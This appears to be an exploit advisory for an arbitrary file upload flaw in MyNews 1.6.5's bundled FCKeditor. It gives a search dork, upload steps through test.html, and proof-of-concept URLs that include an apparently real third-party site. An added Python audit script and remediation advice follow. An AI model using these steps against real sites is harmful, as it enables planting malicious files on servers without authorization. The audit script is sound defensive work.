MyNews Arbitrary File Upload Vuln

[o] MyNews Arbitrary File Upload Vulnerability

Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
Author : NoGe


[o] Exploit

FCKeditor/editor/filemanager/upload/php/config.php

// SECURITY: You must explicitelly enable this "uploader".

$Config['Enabled'] = true ;

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

In the "File Uploader" section, select "PHP".
Browse to the file you want to upload and click "Send it to the Server".
If the file uploads with no error, you will see the file path in "Uploaded File URL".

http://localhost/[path]/files/your_file.txt
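
A defender-side check for the condition above, as an added example that is not part of the original advisory or of the MyNews/FCKeditor code: it walks a local web root, finds FCKeditor copies, and reports where the uploader's config.php sets $Config['Enabled'] to true or where test.html is still deployed. The function names and report fields are assumptions made for this example.

```python
import os
import re
import sys

# Paths relative to an FCKeditor directory, taken from the advisory.
CONFIG_REL = os.path.join("editor", "filemanager", "upload", "php", "config.php")
TEST_REL = os.path.join("editor", "filemanager", "upload", "test.html")

# Matches an uncommented line such as: $Config['Enabled'] = true ;
ENABLED_RE = re.compile(
    r"""^\s*\$Config\[\s*['"]Enabled['"]\s*\]\s*=\s*((?i:true|false))\s*;""",
    re.MULTILINE,
)


def uploader_enabled(php_source):
    """True if the last uncommented $Config['Enabled'] assignment is true."""
    # Strip /* ... */ blocks; the ^ anchor already skips // and # comment lines.
    source = re.sub(r"/\*.*?\*/", "", php_source, flags=re.DOTALL)
    values = ENABLED_RE.findall(source)
    return bool(values) and values[-1].lower() == "true"


def audit(web_root):
    """Report every FCKeditor copy under web_root that needs attention."""
    findings = []
    for dirpath, _dirs, _files in os.walk(web_root):
        if os.path.basename(dirpath).lower() != "fckeditor":
            continue
        config = os.path.join(dirpath, CONFIG_REL)
        enabled = False
        if os.path.isfile(config):
            with open(config, encoding="utf-8", errors="replace") as fh:
                enabled = uploader_enabled(fh.read())
        test_page = os.path.isfile(os.path.join(dirpath, TEST_REL))
        if enabled or test_page:
            findings.append({"path": dirpath, "uploader_enabled": enabled,
                             "test_page_present": test_page})
    return findings


if __name__ == "__main__":
    # Usage: python audit_fckeditor.py /path/to/webroot
    for finding in audit(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(finding)
```

Setting $Config['Enabled'] = false ; in that config.php and removing test.html from the deployed tree clears both findings.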


[o] PoC

http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html
http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html
